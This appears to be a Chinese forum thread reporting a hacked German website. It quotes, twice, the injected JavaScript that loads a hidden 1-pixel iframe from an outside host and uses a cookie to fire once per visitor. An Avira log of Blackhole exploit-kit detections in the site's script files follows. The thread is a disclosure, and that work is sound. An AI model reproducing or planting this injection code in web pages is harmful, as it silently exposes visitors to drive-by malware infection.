http://arco-greenliving.de/townhouse.html【挂马BY哀酱】

哀酱俏佳人

1. function zzzfff(){
   
2.   var nuk = document.createElement('iframe');
   
3.   nuk.src = 'http://ftttf.org/Scripts/XR4JNvtD.php';
   
4.   nuk.style.position = 'absolute';
   
5.   nuk.style.border = '0';
   
6.   nuk.style.height = '1px';
   
7.   nuk.style.width = '1px';
   
8.   nuk.style.left = '1px';
   
9.   nuk.style.top = '1px';
   
10.   if (!document.getElementById('nuk')){
    
11.     document.write('<div id=\'nuk\'></div>');
    
12.     document.getElementById('nuk').appendChild(nuk);
    
13.   }
    
14. }
    
15. function SetCookie(cookieName, cookieValue, nDays, path){
    
16.   var today = new Date();
    
17.   var expire = new Date();
    
18.   if (nDays == null || nDays == 0)nDays = 1;
    
19.   expire.setTime(today.getTime() + 3600000 * 24 * nDays);
    
20.   document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.
    
21.   toGMTString() + ((path) ? "; path=" + path : "");
    
22. }
    
23. function GetCookie(name){
    
24.   var start = document.cookie.indexOf(name + "=");
    
25.   var len = start + name.length + 1;
    
26.   if ((!start) && (name != document.cookie.substring(0, name.length))){
    
27.     return null;
    
28.   }
    
29.   if (start ==  - 1)return null;
    
30.   var end = document.cookie.indexOf(";", len);
    
31.   if (end ==  - 1)end = document.cookie.length;
    
32.   return unescape(document.cookie.substring(len, end));
    
33. }
    
34. if (navigator.cookieEnabled){
    
35.   if (GetCookie('visited_uq') == 55){
    
36.   }
    
37.   else {
    
38.     SetCookie('visited_uq', '55', '1', '/');
    
39.     zzzfff();
    
40.   }
    
41. }

复制代码

1. function zzzfff(){
   
2.   var tzvd = document.createElement('iframe');
   
3.   tzvd.src = 'http://ftttf.org/Scripts/XR4JNvtD.php';
   
4.   tzvd.style.position = 'absolute';
   
5.   tzvd.style.border = '0';
   
6.   tzvd.style.height = '1px';
   
7.   tzvd.style.width = '1px';
   
8.   tzvd.style.left = '1px';
   
9.   tzvd.style.top = '1px';
   
10.   if (!document.getElementById('tzvd')){
    
11.     document.write('<div id=\'tzvd\'></div>');
    
12.     document.getElementById('tzvd').appendChild(tzvd);
    
13.   }
    
14. }
    
15. function SetCookie(cookieName, cookieValue, nDays, path){
    
16.   var today = new Date();
    
17.   var expire = new Date();
    
18.   if (nDays == null || nDays == 0)nDays = 1;
    
19.   expire.setTime(today.getTime() + 3600000 * 24 * nDays);
    
20.   document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.
    
21.   toGMTString() + ((path) ? "; path=" + path : "");
    
22. }
    
23. function GetCookie(name){
    
24.   var start = document.cookie.indexOf(name + "=");
    
25.   var len = start + name.length + 1;
    
26.   if ((!start) && (name != document.cookie.substring(0, name.length))){
    
27.     return null;
    
28.   }
    
29.   if (start ==  - 1)return null;
    
30.   var end = document.cookie.indexOf(";", len);
    
31.   if (end ==  - 1)end = document.cookie.length;
    
32.   return unescape(document.cookie.substring(len, end));
    
33. }
    
34. if (navigator.cookieEnabled){
    
35.   if (GetCookie('visited_uq') == 55){
    
36.   }
    
37.   else {
    
38.     SetCookie('visited_uq', '55', '1', '/');
    
39.     zzzfff();
    
40.   }
    
41. }

复制代码

fireold

Avira

2013/8/5 上午 06:47 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\81REZ51I\jquery-1.4.2.min[1].js'
      包含病毒或有害的程式 'JS/Blacole.EB.31' [virus]
      已採取動作：
      檔案會移動至 '4d7f59ad.qua' 名稱底下的隔離區目錄。.

2013/8/5 上午 06:47 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\AVPGMUFA\jquery.cycle[1].js'
      包含病毒或有害的程式 'JS/Blacole.EB.31' [virus]
      已採取動作：
      檔案會移動至 '55e8760a.qua' 名稱底下的隔離區目錄。.

2013/8/5 上午 06:47 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數：        825
      目錄數：        0
      惡意程式碼數：        3
      警告數：        0

2013/8/5 上午 06:47 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\6IHTB3IO\functions[1].js'
      包含病毒或有害的程式 'JS/Blacole.EB.31' [virus]
      已採取動作：
      檔案會移動至 '1f3f0359.qua' 名稱底下的隔離區目錄。.

2013/8/5 上午 06:47 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\UL724GWW\townhouse[1].htm'
      包含病毒或有害的程式 'JS/Blacole.EB.31' [virus]
      已採取動作：
      檔案會移動至 '558c7853.qua' 名稱底下的隔離區目錄。.

2013/8/5 上午 06:47 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數：        822
      目錄數：        0
      惡意程式碼數：        1
      警告數：        0

2013/8/5 上午 06:47 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\6IHTB3IO\functions[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.31 [virus]'
      執行的動作：傳輸至掃描程式

2013/8/5 上午 06:47 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\6IHTB3IO\functions[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.31 [virus]'
      執行的動作：拒絕存取

2013/8/5 上午 06:47 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\AVPGMUFA\jquery.cycle[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.31 [virus]'
      執行的動作：傳輸至掃描程式

2013/8/5 上午 06:47 [Web Protection] 發現惡意程式碼
      從 URL "http://arco-greenliving.de/lib/js/functions.js" 存取資料時，
      發現病毒或有害的程式 'JS/Blacole.EB.31' [virus]。
      已採取動作：已略過

2013/8/5 上午 06:47 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\AVPGMUFA\jquery.cycle[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.31 [virus]'
      執行的動作：拒絕存取

2013/8/5 上午 06:47 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\81REZ51I\jquery-1.4.2.min[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.31 [virus]'
      執行的動作：傳輸至掃描程式

2013/8/5 上午 06:47 [Web Protection] 發現惡意程式碼
      從 URL "http://arco-greenliving.de/lib/js/jquery.cycle.js" 存取資料時，
      發現病毒或有害的程式 'JS/Blacole.EB.31' [virus]。
      已採取動作：已略過

2013/8/5 上午 06:47 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\81REZ51I\jquery-1.4.2.min[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.31 [virus]'
      執行的動作：拒絕存取

2013/8/5 上午 06:47 [Web Protection] 發現惡意程式碼
      從 URL "http://arco-greenliving.de/lib/jquery/jquery-1.4.2.min.js" 存取資料時，
      發現病毒或有害的程式 'JS/Blacole.EB.31' [virus]。
      已採取動作：已略過

2013/8/5 上午 06:47 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\UL724GWW\townhouse[1].htm 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.31 [virus]'
      執行的動作：傳輸至掃描程式

2013/8/5 上午 06:47 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\UL724GWW\townhouse[1].htm 中
      偵測到病毒或有害的程式 'JS/Blacole.EB.31 [virus]'
      執行的動作：拒絕存取

2013/8/5 上午 06:47 [Web Protection] 發現惡意程式碼
      從 URL "http://arco-greenliving.de/townhouse.html" 存取資料時，
      發現病毒或有害的程式 'JS/Blacole.EB.31' [virus]。
      已採取動作：已略過

brisklee

BD